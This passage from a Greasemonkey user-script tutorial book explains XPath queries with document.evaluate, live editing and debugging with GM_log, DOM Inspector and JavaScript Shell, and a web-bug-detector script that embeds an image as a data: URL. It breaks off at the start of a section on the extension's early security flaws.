Firefox contains a little-known but powerful feature called XPath. XPath is a query language for searching the Document Object Model (DOM) that Firefox constructs from the source of a web page.
As mentioned in "Add or Remove Content on a Page" [Hack #6], virtually every hack in this book revolves around the DOM. Many hacks work on a collection of elements. Without XPath, you would need to get a list of elements (for example, with document.getElementsByTagName) and then test each one to see if it's something of interest. With XPath expressions, you can find exactly the elements you want, all in one shot, and then immediately start working with them.
Tip
A good beginners' tutorial on XPath is available at http://www.zvon.org/xxl/XPathTutorial/General/examples.html.
Basic Syntax
To execute an XPath query, use the document.evaluate function. Here's the basic syntax:
var snapshotResults = document.evaluate('XPath expression', document, null, XPathResult.UNORDERED_NODE_SNAPSHOT_TYPE, null);
The function takes five parameters:
- The XPath expression itself
- More on this in a minute.
- The root node on which to evaluate the expression
- If you want to search the entire web page, pass in document. But you can also search just a part of the page. For example, to search within a <div id="foo">, pass document.getElementById("foo") as the second parameter.
- A namespace resolver function
- You can use this to create XPath queries that work on XHTML pages. See "Select Multiple Checkboxes" [Hack #36] for an example.
- The type of result to return
- If you want a collection of elements, use XPathResult.UNORDERED_NODE_SNAPSHOT_TYPE. If you want to find a single element, use XPathResult.FIRST_ORDERED_NODE_TYPE. More on this in a minute, too.
- A previous XPath result to append to this result
- I rarely use this, but it can be useful if you want to conditionally concatenate the results of multiple XPath queries.
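For the third parameter, a namespace resolver is simply a function that maps a prefix used in the expression to a namespace URI. The sketch below is an illustration and is not taken from Hack #36. The prefix xhtml and the function name are arbitrary choices; the URI is the standard XHTML namespace.

```javascript
// Hypothetical resolver: knows a single prefix, "xhtml".
function resolveXhtmlPrefix(prefix) {
    if (prefix === 'xhtml') {
        return 'http://www.w3.org/1999/xhtml';
    }
    return null; // unknown prefix
}

// In a user script running on an XHTML page, you might write:
// var snapLinks = document.evaluate("//xhtml:a", document,
//     resolveXhtmlPrefix, XPathResult.UNORDERED_NODE_SNAPSHOT_TYPE, null);
```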
When you ask for a snapshot result type, the document.evaluate function returns a snapshot, which is a static list of DOM nodes. You can iterate through the snapshot or access its items in any order. The snapshot is static, which means it will never change, no matter what you do to the page. You can even delete DOM nodes as you move through the snapshot.
A snapshot is not an array, and it doesn't support the standard array properties or accessors. To get the number of items in the snapshot, use snapResults.snapshotLength. To access a particular item, call snapResults.snapshotItem(index). Here is the skeleton of a script that executes an XPath query and loops through the results:
var snapResults = document.evaluate("XPath expression", document, null,
    XPathResult.UNORDERED_NODE_SNAPSHOT_TYPE, null);
for (var i = snapResults.snapshotLength - 1; i >= 0; i--) {
    var elm = snapResults.snapshotItem(i);
    // do stuff with elm
}
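If you would rather work with a real array, you can copy the snapshot into one. This is a small sketch with a hypothetical helper name (snapshotToArray). It relies only on snapshotLength and snapshotItem, the two members described above.

```javascript
// Hypothetical helper: copy a snapshot's nodes into a real array.
function snapshotToArray(snap) {
    var arNodes = [];
    for (var i = 0; i < snap.snapshotLength; i++) {
        arNodes.push(snap.snapshotItem(i));
    }
    return arNodes;
}
```

The result supports the usual array properties and methods, such as length and slice.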
Examples
The following XPath query finds all the elements on a page with class="foo":
var snapFoo = document.evaluate("//*[@class='foo']", document, null, XPathResult.UNORDERED_NODE_SNAPSHOT_TYPE, null);
The // means "search for things anywhere below the root node, including nested elements." The * matches any element, and [@class='foo'] restricts the search to elements with a class of foo.
You can use XPath to search for specific elements. The following query finds all <input type="hidden"> elements. (This example is taken from "Show Hidden Form Fields" [Hack #30].)
var snapHiddenFields = document.evaluate("//input[@type='hidden']", document, null, XPathResult.UNORDERED_NODE_SNAPSHOT_TYPE, null);
You can also test for the presence of an attribute, regardless of its value. The following query finds all elements with an accesskey attribute. (This example is taken from "Add an Access Bar with Keyboard Shortcuts" [Hack #68].)
var snapAccesskeys = document.evaluate("//*[@accesskey]", document, null, XPathResult.UNORDERED_NODE_SNAPSHOT_TYPE, null);
Not impressed yet? Here's a query that finds images whose URL contains the string "MZZZZZZZ". (This example is taken from "Make Amazon Product Images Larger" [Hack #25].)
var snapProductImages = document.evaluate("//img[contains(@src, 'MZZZZZZZ')]", document, null, XPathResult.UNORDERED_NODE_SNAPSHOT_TYPE, null);
You can also do combinations of attributes. This query finds all images with a width of 36 and a height of 14. (This query is taken from "Zap Ugly XML Buttons" [Hack #86].)
var snapXMLImages = document.evaluate("//img[@width='36'][@height='14']", document, null, XPathResult.UNORDERED_NODE_SNAPSHOT_TYPE, null);
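Stacking predicates like this is mechanical enough to generate. The following sketch uses a made-up helper, buildAttributeQuery, and assumes that attribute values never contain a single quote, since it does no escaping:

```javascript
// Hypothetical helper: build "//tag[@a='1'][@b='2']" from an object.
// Assumes values contain no single quotes (no escaping is done).
function buildAttributeQuery(tagName, attrs) {
    var query = '//' + tagName;
    for (var name in attrs) {
        if (Object.prototype.hasOwnProperty.call(attrs, name)) {
            query += "[@" + name + "='" + attrs[name] + "']";
        }
    }
    return query;
}
```

The returned string can be passed as the first argument to document.evaluate.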
But wait, there's more! By using more advanced XPath syntax, you can actually find elements that are contained within other elements. This code finds all the links that are contained in a paragraph whose class is g. (This example is taken from "Refine Your Google Search" [Hack #96].)
var snapResults = document.evaluate("//p[@class='g']//a", document, null, XPathResult.UNORDERED_NODE_SNAPSHOT_TYPE, null);
Finally, you can find a specific element by passing XPathResult.FIRST_ORDERED_NODE_TYPE in the fourth parameter. This line of code finds the first link whose class is "yschttl". (This example is taken from "Prefetch Yahoo! Search Results" [Hack #52].)
var elmFirstResult = document.evaluate("//a[@class='yschttl']", document, null, XPathResult.FIRST_ORDERED_NODE_TYPE, null).singleNodeValue;
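If you look up single nodes often, you can wrap the call. This is a sketch under a few assumptions: findFirst is a hypothetical name, the document is passed in as a parameter, and the numeric fallback 9 is the value the DOM XPath specification assigns to FIRST_ORDERED_NODE_TYPE.

```javascript
// XPathResult.FIRST_ORDERED_NODE_TYPE is 9 in the DOM XPath specification;
// the fallback lets this file load outside a browser.
var FIRST_NODE = (typeof XPathResult !== 'undefined')
    ? XPathResult.FIRST_ORDERED_NODE_TYPE : 9;

// Hypothetical helper: return the first matching node, or null if none.
function findFirst(doc, query, root) {
    var result = doc.evaluate(query, root || doc, null, FIRST_NODE, null);
    return result.singleNodeValue;
}

// In a user script, you might write:
// var elmFirstResult = findFirst(document, "//a[@class='yschttl']");
```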
If you weren't brain-fried by now, I'd be very surprised. XPath is, quite literally, a language all its own. Like regular expressions, XPath can make your life easier, or it can make your life a living hell. Remember, you can always get what you need (eventually) with standard DOM functions such as document.getElementById or document.getElementsByTagName. XPath's a good tool to have in your tool chest, but it's not always the right tool for the job.
Develop a User Script "Live"
Edit a user script and see your changes immediately.
While you're writing a user script, you will undoubtedly need to make changes incrementally and test the results. As shown in "Install a User Script" [Hack #1], Greasemonkey stores your installed user scripts deep within your Firefox profile directory. Changes to these installed files take effect immediately, as soon as you refresh the page. This makes the testing cycle quick, because you can edit your partially written script, save changes, and refresh your test page to see the changes immediately.
Setting Up File Associations
Before you can take advantage of live editing, you need to set up file associations on your system, so that double-clicking a .user.js script opens the file in your text editor instead of trying to execute it or viewing it in a web browser.
On Mac OS X.
Control-click a .user.js file in Finder, and then select Get Info. In the Open With section, select your text editor from the drop-down menu, or select Other… to find the editor program manually. Click Change All to permanently associate your editor with .js files.
On Windows.
Right-click a .user.js file in Explorer, and then select Open With → Choose Program. Select your favorite text editor from the list, or click Browse to find the editor application manually. Check the box titled "Always use the selected program to open this kind of file" and click OK.
The "Live Editing" Development Cycle
Switch back to Firefox and select Tools → Manage User Scripts. Select a script from the pane on the left and click Edit. If your file associations are set up correctly, this should open the user script in your text editor.
The first time you do this on Windows, you will get a warning message, explaining that you need to set up your file associations, as shown in Figure 1-9. You're one step ahead of the game, since you've already done this.
Tip
The reason for the warning is that, by default, Windows is configured to execute .js files in the built-in Windows Script Host environment. This is generally useless, and certainly confusing if you don't know what's going on.
Once the user script opens in your text editor, you can make any changes you like to the code. You're editing the copy of the user script within your Firefox profile directory—the copy that Greasemonkey uses. As soon as you make a change and save it, you can switch back to Firefox and refresh your test page to see the effect of your change. Switch to your editor, make another change, switch back to Firefox, and refresh. It's that simple.
Tip
During live editing, you can change only the code of a user script, not the configuration parameters in the metadata section. If you want to change where the script runs, use the Manage User Scripts dialog.
When you're satisfied with your user script, switch back to your editor one last time and save a copy to another directory.
Warning
Remember, you've been editing the copy deep within your Firefox profile directory. I've lost significant chunks of code after live-editing a user script and then uninstalling it without saving a copy first. Don't make this mistake! Save a backup somewhere else for safekeeping.
Debug a User Script
Learn the subtle art of Greasemonkey debugging.
The actual process of writing user scripts can be frustrating if you don't know how to debug them properly. Since JavaScript is an interpreted language, errors that would otherwise cause a compilation error (such as misspelled variables or function names) can only be caught when they occur at runtime. Furthermore, if something goes wrong, it's not immediately obvious how to figure out what happened, much less how to fix it.
Check Error Messages
If your user script doesn't appear to be running properly, the first place to check is JavaScript Console, which lists all script-related errors, including those specific to user scripts. Select Tools → JavaScript Console to open the JavaScript Console window. You will probably see a long list of all the script errors on all the pages you've visited since you opened Firefox. (You'd be surprised how many high-profile sites have scripts that crash regularly.)
In the JavaScript Console window, click Clear to remove the old errors from the list. Now, refresh the page you're using to test your user script. If your user script is crashing or otherwise misbehaving, you will see the exception displayed in JavaScript Console.
Tip
If your user script is crashing, JavaScript Console will display an exception and a line number. Due to the way Greasemonkey injects user scripts into a page, this line number is not actually useful, and you should ignore it. It is not the line number within your user script where the exception occurred.
If you don't see any errors printed in JavaScript Console, you might have a configuration problem. Go to Tools → Manage User Scripts and double-check that your script is installed and enabled and that your current test page is listed in the Included Pages list.
Log Errors
OK, so your script is definitely running, but it isn't working properly. What next? You can litter your script with alert calls, but that's annoying. Instead, Greasemonkey provides a logging function, GM_log, that allows you to write messages to JavaScript Console. Such messages should be taken out before release, but they are enormously helpful in debugging. Plus, watching the console pile up with log messages is much more satisfying than clicking OK over and over to dismiss multiple alerts.
GM_log takes one argument, the string to be logged. After logging to JavaScript Console, the user script will continue executing normally.
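Because the line number that JavaScript Console reports for a user script is not useful, one way to narrow down a failure is to wrap each stage of the script in try/catch and log a label of your own. This is a sketch, not part of the original hack. The name runStep and the label are hypothetical, and the logging function is passed in as a parameter so that a user script can hand it GM_log.

```javascript
// Hypothetical helper: run one stage of a script and report failures
// with a label, since the console's line number won't help.
function runStep(label, fn, log) {
    try {
        fn();
        return true;
    } catch (e) {
        log(label + ' failed: ' + e.message);
        return false;
    }
}

// In a user script, you might write:
// runStep('rewrite links', rewriteLinks, GM_log);
```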
Save the following user script as testlog.user.js:
// ==UserScript==
// @name          TestLog
// @namespace     http://example.com/
// ==/UserScript==

if (/^http:\/\/www\.oreilly\.com\//.test(location.href)) {
    GM_log("running on O'Reilly site");
} else {
    GM_log('running elsewhere');
}
GM_log('this line is always printed');
If you install this user script and visit http://www.oreilly.com, these two lines will appear in JavaScript Console:
Greasemonkey: http://example.com//TestLog: running on O'Reilly site
Greasemonkey: http://example.com//TestLog: this line is always printed
Greasemonkey dumps the namespace and script name, taken from the user script's metadata section, then the message that was passed as an argument to GM_log.
If you visit somewhere other than http://www.oreilly.com, these two lines will appear in JavaScript Console:
Greasemonkey: http://example.com//TestLog: running elsewhere
Greasemonkey: http://example.com//TestLog: this line is always printed
Messages logged in JavaScript Console are not limited to 255 characters. Plus, lines in JavaScript Console wrap properly, so you can always scroll down to see the rest of your log message. Go nuts with logging!
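Since log messages should come out before release, it can help to route them all through one switch instead of hunting down each call. This is a sketch with a hypothetical helper named makeLogger. The underlying logging function is passed in, so a user script would hand it GM_log.

```javascript
// Hypothetical helper: returns a logging function that does nothing
// when logging is disabled.
function makeLogger(enabled, log) {
    return function (message) {
        if (enabled) {
            log(message);
        }
    };
}

// In a user script, you might write:
// var debug = makeLogger(true, GM_log);   // flip to false before release
// debug('found ' + snapResults.snapshotLength + ' links');
```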
Tip
In JavaScript Console, you can right-click (Mac users Control-click) on any line and select Copy to copy it to the clipboard.
Find Page Elements
DOM Inspector allows you to explore the parsed Document Object Model (DOM) of any page. You can get details on each HTML element, attribute, and text node. You can see all the CSS rules from each page's stylesheets. You can explore all the scriptable properties of an object. It's extremely powerful.
DOM Inspector is included with the Firefox installation program, but depending on your platform, it might not be installed by default. If you don't see a DOM Inspector item in the Tools menu, you will need to reinstall Firefox and choose Custom Install, then select Developer Tools. (Don't worry; this will not affect your existing bookmarks, preferences, extensions, or user scripts.)
A nice addition to DOM Inspector is the Inspect Element extension. It allows you to right-click on any element—a link, a paragraph, even the page itself—and open DOM Inspector with that element selected. From there, you can inspect its properties, or see exactly where it fits within the hierarchy of other elements on the page.
Tip
Download the Inspect Element extension at https://addons.update.mozilla.org/extensions/moreinfo.php?id=434.
One last note: DOM Inspector does not follow you as you browse. If you open DOM Inspector and then navigate somewhere else in the original window, DOM Inspector will get confused. It's best to go where you want to go, inspect what you want to inspect, then close DOM Inspector before doing anything else.
Test JavaScript Code Interactively
JavaScript Shell is a bookmarklet that allows you to evaluate arbitrary JavaScript expressions in the context of the current page. You install it simply by dragging it to your links toolbar. Then you can visit a web page you want to work on, and click the JavaScript Shell bookmarklet in your toolbar. The JavaScript Shell window will open in the background.
Tip
Install JavaScript Shell from http://www.squarefree.com/bookmarklets/webdevel.html.
JavaScript Shell offers you the same power as DOM Inspector but in a free-form environment. Think of it as a command line for the DOM. You can enter any JavaScript expressions or commands, and you will see the output immediately. You can even make changes to the page, such as creating a new element with document.createElement and adding it to the page with document.body.appendChild. Your changes are reflected in the original page.
One feature of JavaScript Shell that is worth special mention is the props function. Visit http://www.oreilly.com, open JavaScript Shell, and then type the following two lines:
var link = document.getElementsByTagName('a')[0]
props(link)
JavaScript Shell spews out a long list of properties:
Methods of prototype: blur, focus
Fields of prototype: id, title, lang, dir, className, accessKey, charset, coords, href, hreflang, name, rel, rev, shape, tabIndex, target, type, protocol, host, hostname, pathname, search, port, hash, text, offsetTop, offsetLeft, offsetWidth, offsetHeight, offsetParent, innerHTML, scrollTop, scrollLeft, scrollHeight, scrollWidth, clientHeight, clientWidth, style
Methods of prototype of prototype of prototype: insertBefore, replaceChild, removeChild, appendChild, hasChildNodes, cloneNode, normalize, isSupported, hasAttributes, getAttribute, setAttribute, removeAttribute, getAttributeNode, setAttributeNode, removeAttributeNode, getElementsByTagName, getAttributeNS, setAttributeNS, removeAttributeNS, getAttributeNodeNS, setAttributeNodeNS, getElementsByTagNameNS, hasAttribute, hasAttributeNS, addEventListener, removeEventListener, dispatchEvent, compareDocumentPosition, isSameNode, lookupPrefix, isDefaultNamespace, lookupNamespaceURI, isEqualNode, getFeature, setUserData, getUserData
Fields of prototype of prototype of prototype: tagName, nodeName, nodeValue, nodeType, parentNode, childNodes, firstChild, lastChild, previousSibling, nextSibling, attributes, ownerDocument, namespaceURI, prefix, localName, ELEMENT_NODE, ATTRIBUTE_NODE, TEXT_NODE, CDATA_SECTION_NODE, ENTITY_REFERENCE_NODE, ENTITY_NODE, PROCESSING_INSTRUCTION_NODE, COMMENT_NODE, DOCUMENT_NODE, DOCUMENT_TYPE_NODE, DOCUMENT_FRAGMENT_NODE, NOTATION_NODE, baseURI, textContent, DOCUMENT_POSITION_DISCONNECTED, DOCUMENT_POSITION_PRECEDING, DOCUMENT_POSITION_FOLLOWING, DOCUMENT_POSITION_CONTAINS, DOCUMENT_POSITION_CONTAINED_BY, DOCUMENT_POSITION_IMPLEMENTATION_SPECIFIC
Methods of prototype of prototype of prototype of prototype of prototype: toString
What's this all about? It's a list of all the properties and methods of that <a> element that are available to you in JavaScript, grouped by levels in the DOM object hierarchy. Methods and properties that are specific to link elements (such as the blur and focus methods, and the href and hreflang properties) are listed first, followed by methods and properties shared by all types of nodes (such as the insertBefore method).
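To get a feel for where that grouping comes from, here is a rough sketch of walking an object's prototype chain and listing the names defined at each level. It is not JavaScript Shell's actual implementation. The function name describeLevels is made up, and it relies on the standard Object.getPrototypeOf and Object.getOwnPropertyNames functions.

```javascript
// Hypothetical helper: one array of property names per level of the
// prototype chain, starting with the object itself.
function describeLevels(obj) {
    var levels = [];
    for (var o = obj; o !== null && o !== undefined;
            o = Object.getPrototypeOf(o)) {
        levels.push(Object.getOwnPropertyNames(o).sort());
    }
    return levels;
}

// Example with plain objects instead of DOM nodes:
var base = { shared: 1 };
var child = Object.create(base);
child.own = 2;
var levels = describeLevels(child);
// levels[0] holds the names on child, levels[1] the names on base,
// and the last level holds the names on Object.prototype.
```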
Again, this is the same information that is available in DOM Inspector—but with more typing and experimenting, and less pointing and clicking.
Tip
Like DOM Inspector, JavaScript Shell does not follow you as you browse. If you open JavaScript Shell and then navigate somewhere else in the original window, JavaScript Shell will get confused. It's best to go where you want to go, open JavaScript Shell, fiddle to your heart's content, and then close JavaScript Shell before doing anything else. Be sure to copy your code from the JavaScript Shell window and paste it into your user script once you're satisfied with it.
Embed Graphics in a User Script
Add images to web pages without hitting a remote server.
A user script is a single file. Greasemonkey does not provide any mechanism for bundling other resource files, such as image files, along with the JavaScript code. While this might offend the sensibilities of some purists who would prefer to maintain separation between code, styles, markup, and media resources, in practice, it is rarely a problem for me.
This is not to say you can't include graphics in your scripts, but you need to be a bit creative. Instead of posting the image to a web server and having your user script fetch it, you can embed the image data in the script itself by using a data: URL. A data: URL allows you to encode an image as printable text, so you can store it as a JavaScript string. And Firefox supports data: URLs natively, so you can insert the graphic directly into a web page by setting an img element's src attribute to the data: URL string. Firefox will display the image without sending a separate request to any remote server.
Tip
You can construct data: URLs from your own image files at http://software.hixie.ch/utilities/cgi/data/data.
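If you already have an image's Base64 text, assembling the URL yourself takes one line. This is a sketch, and makeDataUrl is a hypothetical name. It percent-escapes characters such as +, /, and = with the standard encodeURIComponent function, which is the same form used by the image data in this hack's script (look for %2B, %2F, and %3D).

```javascript
// Hypothetical helper: build a data: URL from a MIME type and
// Base64-encoded data.
function makeDataUrl(mimeType, base64Data) {
    return 'data:' + mimeType + ';base64,' + encodeURIComponent(base64Data);
}

// In a user script, you might write:
// elmImage.src = makeDataUrl('image/png', strBase64FromYourImage);
```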
The Code
This user script runs on all pages. It uses an XPath query to find web bugs: 1 x 1-pixel img elements that advertisers use to track your movement online. The script filters this list of potential web bugs to include only those images that point to a third-party site, since many sites use 1 x 1-pixel images for spacing in table-based layouts.
There is no way for Greasemonkey to eliminate web bugs altogether; by the time a user script executes, the image has already been fetched. But we can make them more visible by changing the src attribute of the img element after the fact. The image data is embedded in the script itself.
Save the following user script as webbugs.user.js:
// ==UserScript==
// @name          Web Bug Detector
// @namespace     http://diveintomark.org/projects/greasemonkey/
// @description   make web bugs visible
// @include       *
// ==/UserScript==

var snapImages = document.evaluate("//img[@width='1'][@height='1']",
    document, null, XPathResult.UNORDERED_NODE_SNAPSHOT_TYPE, null);
for (var i = snapImages.snapshotLength - 1; i >= 0; i--) {
    var elmImage = snapImages.snapshotItem(i);
    var urlSrc = elmImage.src;
    // extract the host name from the image URL
    var urlHost = urlSrc.replace(/^(.*?):\/\/(.*?)\/(.*)$/, "$2");
    // skip images served by the current site (probably spacers)
    if (urlHost == window.location.host) continue;
    elmImage.width = '80';
    elmImage.height = '80';
    elmImage.title = 'Web bug detected! src="' + elmImage.src + '"';
    elmImage.src = 'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAFAAAABQCAYAAACOEfKtAA' +
'AABHNCSVQICAgIfAhkiAAAABl0RVh0U29mdHdhcmUAd3d3Lmlua3NjYXBlLm9yZ5vuPB' +
'oAAAv3SURBVHic7Zx5kFxVGcV%2FvWVmemaSSSYxiRkSgglECJK4gAtSEjQFLmjEUhEV' +
'CxUs1NJyK5WScisKFbHUwo0q10jQABZoEJBEtgSdArNHkhCyTTKZzNo9S3dm6faPc2%2' +
'FepNP9Xvfrnu5J2afqVXq6X7%2F3vXO%2F%2By3n3g5UUUUVVVRRRRVVVFFFFVVU4Y4p' +
'lTbgTEUAmA%2F8CohU2JYzEtOBbwKDQH1lTTkVwQm%2Bfk0J7hEG5gCrgAFgYbFGlRIT' +
'TWAT0EJx064BuMBc52nzetJgognsB6YBF%2BIvAQSAZuAa4F9AG4qFkwYTTWACxa3lwP' +
'UU7olRYCbwduAp4Ih5P1wqA4vFRBOYBnqAHciLPl%2FgPRuBDwLDwEbgkHmdLq2Z%2Fh' +
'Eqwz1GgVqgA7gT6AOey%2BN7ITRdvwfcAzxh3gsC2yfCUD%2BYaA8EEdgN7AceQuVISx' +
'7fiwJXI2%2F7E5AETgC7mUQeWA4CAWLI89airPo1RJAbpgHXAr9HYaAfxdS%2BCbDPNw' +
'%2FlInAM6ERJ4B%2FADbiXI0FE4CvQdE8gApPASIlsCqAYeyHwfeTlBVcK5SIQREAMuB' +
'dNwVvJ3VXUAPOQlx5HU3cMDUB3kXZMAWYAVwG%2FBR43f%2B8C7qPASqGcBI4CXcBLKC' +
'm8A1iR49wpwNko41rPA4ijsqhQBFHoaAE%2BhWbBPaizuRGFiVZgPbCaAsqkctdT%2FS' +
'ie%2FRl4M%2FAdYAOnk1KPHjaOiB%2F2eb8aRNxS4L2oJKoFHjT3Pgr0mnvMQwkqiUSL' +
'j5NHsnIjcKq5QAjFiySaRinzr59MOIySQBfwU%2BBHwGXA3zPOq0MExsy9Rgu4RxANwJ' +
'tQFn8bsMhc6yHgAeAYGshONEgBc5%2F5wAHkmZ8xNrrCjcAw8DIUhy4zRtSah6vDSQwd' +
'wH9R%2FEjl8YBxROJ2c7wfTSlLUgBN4Zeb80bNvbxQj8haBaxEAgTIy34OPILiaa%2Bx' +
'2w6ORZuxfz5KVH0owbjWnG4E9iCPmYG6gB3m%2FSB6yFpE8BzgQ8CXgc%2BhntWNyCQw' +
'ZB5gB3Almma2PAkjr59rHvSE2wOY714D%2FBhlbtAgPYPEh6fMtftwiMvm0SmUpMZQ%2' + 'FE2i7B%2FAZbZ5xcABFJ%2B6jKENyPsiiMBe4EXg38DFaHqsA25BnpnrxnGk1GwFPgxc' + 'DvxlnE1hROBe3ONfFHgdIi9hrrEVJapBlLF7EHmDeHtyGmhHg3YOiqFFEWgvOmSO48gD' + 'a8wRRVOnFnjSGH6TeYjbgbvRIGRiyDzQduQNq1AcTBqbapEK00vuui%2BCptudxpavoM' + 'GM4xTu4zN4Iegxdi1AuWAiiveTCKOC9CykulwF%2FBARtwf4pPk8E03A61H91QHMMu9P' + 'R3ExjfrgpizfDSLy7jbn3Y48caE5v1Q9fhQls0CuE0pRB46ikW4DDiIv%2FBtSXoZRSd' + 'ABfCPDEBsLd6FYusLYYz0LHE%2FIxEwUO28AHkZlSSfKrn3kl3TywZC5bs5lhFKrMQlz' + '0zHzuhWRsRDFuQGUZNLmnCZExuWI7EdRnL0Seee9wDZOJXEqcBHwCxSvbkGZ9jDeCccP' + 'bBlVVgGjGTgPuAR4F%2FAYDmmfwBm4eebzFIqvc1C5tNac%2Fx4U3yxqgVcjr%2B0Hrg' + 'NemXHOGY0gSiJxFPz%2FA3wJtW33IVJOoDhZi7zzrah4TaN4uQSVIGngUhxywsBinDLp' + 'W8gTvVSdMwZn43haN%2Bov%2B8zfu4BPA79GD78ZdQUJ8%2Fn4ox15Vwp1E1EUO1tQvE' + 'ujcukS5OkVRc7sUgBCaL3jDpRBN6LKvwfFt5sQEWPA%2FUBzOBx%2By4IFC0KLFy8mGo' + '0SCoUIBAKMjIywd%2B9e9uzZw%2FDwMCiAfwR4HmX2j6LB%2BCyqEduosLhaLIEtwF2o' + '5%2BxHGfdpVId1ofKlGbWCNwLT6uvrWbZsGXV1dYTD4axHIBBg9%2B7dtLa2gjxyDfAF' + 'c92bEaH78S8ylAx%2Bs3AjmpJ%2FQEH9eeDbqDXrRBnxCMq6tmcOhUKh5YsWLQJgdHT0' + '5DE2NnbK36lUiubmZmKxGPF4vBFlZIDvApvQ4lICxcXXosG5FrV0s4EXKJ3w6opCPXA%' + '2B6nc%2FhnrkBPAbFPsGUL1nJSI7tWYj6WpNfX19ePbs2ad4WyQSyemJfX19bNy40d57' + 'DfAT5JHLUYZeiVq%2BTPQjve9nqAyaMORL4BvQFHo3jmK7BRl4DCWNdnNktk7NaEVtaV' + '1dHQ0NDZ7EjSdw27ZtADtRsbwMhYMGc%2B2jwD%2BRYNCISqdFwLmoRAL16avNOTvITz' + 'HKG14Engf8DmU8iwGUTTcgsjpQMO8me0D%2FIkowhEIhIpFIXuRFIhEOHz5MZ2cn6KFt' + '15RE03g9IjaJCt0IksHsMzWgyuAcNM2XoiJ%2FCyrwn0XkF7VE4EZgANVlvxxn%2BKOo' + 'hOhFWfYo2b3Ooha1dVdkfuBGXDgcJh6P093dDSInjDTHx1GWH0Dhw6pFKTR4EaQWRc1r' + 'e6TN%2B8uRanQxas%2B6UdeTzzp1VripMQHUNg2i%2BuuvqEBOoGl7BBHpNiWa0OifBp' + 'swQJ5pyQsGgyQSCUZGTuaAl1BNuRNnda4fkdePCvMRY69deK8zttfiyPonkNc9a85bgh' + 'LgH1FB7ke1cfXAEFo5C6Asm0SFcQciMJ8bXo1iFyC1cyZ6Iiv5dnpfI21sGEbZdwOSrm' + 'Ie37Oibx3yNqtlNuLIcSnUSiaR%2BFEwvDywAZHVhZ61F7l9PoE4hBPsmY8C6hwUqBLm' + 'ggdQRZwDMTQAAyiBvAb10nfgTWDa3CaBws0URGATIrEOJbi1qNhfjjqkguBWB4aQ0HkQ' + 
'PWO7MSTfyj%2BCSozrpqMs9CpE4AzzFFbos%2FMxAymk852P%2Bt91SIBdaU5fn6cdFm' + 'NoGtulURsjpqG4ugL14AXBTQ8MINcfRIE87uPaXcDYAhRw5qLWpQUJgNOR5HtW9u8%2F' + 'gLIlKIT0oDi4CRXNfkWENHqmDmNfL%2FLOA%2FhY5vUisAGl%2FhEKr59SKG71zELDPB' + 'cRNg%2FJz43mmMppwXgfKpWS5ivdSO7qRwmlBXVCxWAUzapO5J07ya5%2BuyIfDxzAX8' + '85gozcnUJD3IyU1bk4kTyIRmhcXDiA2sI2NK3sIk87IvEQzsJVsbtVR3FifAM%2BMrEX' + 'gSH87wxIG4MeO4TmzAk0bYPmgifMsc%2F5zmbg66jmG0IZ8kWUCOLoQXuQthgCfkDxgs' + 'ggInEEH78AcJvzltw0%2FlWPHuCZvbBjMyxtRKyA5k0XitrHJVFZ%2Bd7WmOej%2Bmw1' + 'jmf0mq9NRyRej6b0Op%2F2jbfTToqC4FXG2Crfr7LRjx74tgfh1gOw5FI0zAeBVti3Xz' + 'uktmPiJZKpksD7jA32M1Cs6kLR4GGkdN%2BFem0%2Fm44sxtDAFSzQehG4CU3hQvamjM' + 'coiluHga9uhdlb4YIA9KX1XifODqweFOd6UZ65wnzexqkzwE7l6aiGuxmtznnuY%2FHA' + 'EI76nbdImw%2BBtozxi%2BMoh9j1kGNpZ6XL7hnsNscICh1LkKryhHlv%2FAxIm2vOQr' + 'XgG9HaSbEEQm5BJCe8CLS7qYohMI1i2hCqoW2cGTLXzszydUiyAklR%2FVmuOYhIbAJu' + 'QwvwtmYtBgUvD%2BRDYIdvcxykcLwshKOeZEMUEb0PKTnZtoakjV1NyGM3IVXl%2FhLY' + 'WhC8ypgenMRZKrjtLbQK0EU4slmu%2B9u9OnG0PW5Vac3MD14EHiuXIQY1qF0%2BFy0T' + 'eAkXveY4jmJpOX73cgrcCByl9N7nhSjypA0o02aLf%2BMxhKMJbqECP8h2IzBb7JloNA' + 'LvRBJWjPwGsBeR2Immf1nhRmBJF1%2FyQA2S2ttRMT1%2BZc8NdkNTFxX4MXY5f%2Bbg' + 'hXrgA2jLRwzv6WsxZs61G0HLislE4Cwk1jyHkkche%2FxilGkhPROThcBatOb8CCIvX%' + '2B%2BzsAtNZd8nM1kIjKL1jg2oOyl0o2QKxc6ye%2BFk%2BOV3AP3wcC%2FyPq%2FFol' + 'yIUYH%2FEmUyeGAt2jz0JO6dhxeK0S19YzIQ2IBqTvtjmEnzY%2Bp8UGkCA0i6egFNwU' + 'oU70Wh0jEwitTnEIWXLpMClfbAqSjwx%2FCfPCqKShIYQr3vIJL3ixFt%2Fy8RRsJp9b' + '%2B0q6KKKqqooooqfOB%2F6MmP5%2BlO7YkAAAAASUVORK5CYII%3D'; }
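The third-party check in the script relies on a regular expression that pulls the host name out of the image URL. Here is the same logic, isolated as a hypothetical function named isThirdParty so you can try it on its own. In the script, the page's host comes from window.location.host; here it is passed in as a parameter.

```javascript
// Hypothetical helper: true if urlSrc points to a host other than pageHost.
function isThirdParty(urlSrc, pageHost) {
    // "$2" is the text between "://" and the next "/".
    // A URL with no slash after the host does not match the pattern
    // and is returned unchanged.
    var urlHost = urlSrc.replace(/^(.*?):\/\/(.*?)\/(.*)$/, "$2");
    return urlHost != pageHost;
}
```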
Running the Hack
After installing the user script (Tools → Install This User Script), go to http://quicken.intuit.com/ and scroll to the bottom of the page. You will see a web bug made visible, as shown in Figure 1-10.
The graphic of the spider does not come from any server; it is embedded in the user script itself. This makes it easy to distribute a graphics-enabled Greasemonkey script without worrying that everyone who installs it will pound your server on every page request.
Avoid Common Pitfalls
Learn the history of Greasemonkey security and how it affects you now.
Once upon a time, there was a security hole. (This is not your standard fairy tale. Stay with me.) Greasemonkey's architecture has changed substantially since it was first written. Version 0.3, the first version to gain wide popularity, had a fundamental security flaw: it trusted the remote page too much when it injected and executed user scripts.
Back in those days, Greasemonkey's injection mechanism was simple, elegant…and wrong. It initialized a set of API functions as properties of the global window object, so that user scripts could call them. Then, it determined which user scripts ought to execute on the current page based on the @include and @exclude parameters. It loaded the source code of each user script, created a <script> element, assigned the source code of the user script to the contents of the <script> element, and inserted the element into the page. Once all the user scripts finished, Greasemonkey cleaned up the page by removing the <script> elements it had inserted and removing the global properties it had added.
Simple and elegant, to be sure; so why was it wrong?
Security Hole #1: Source Code Leakage
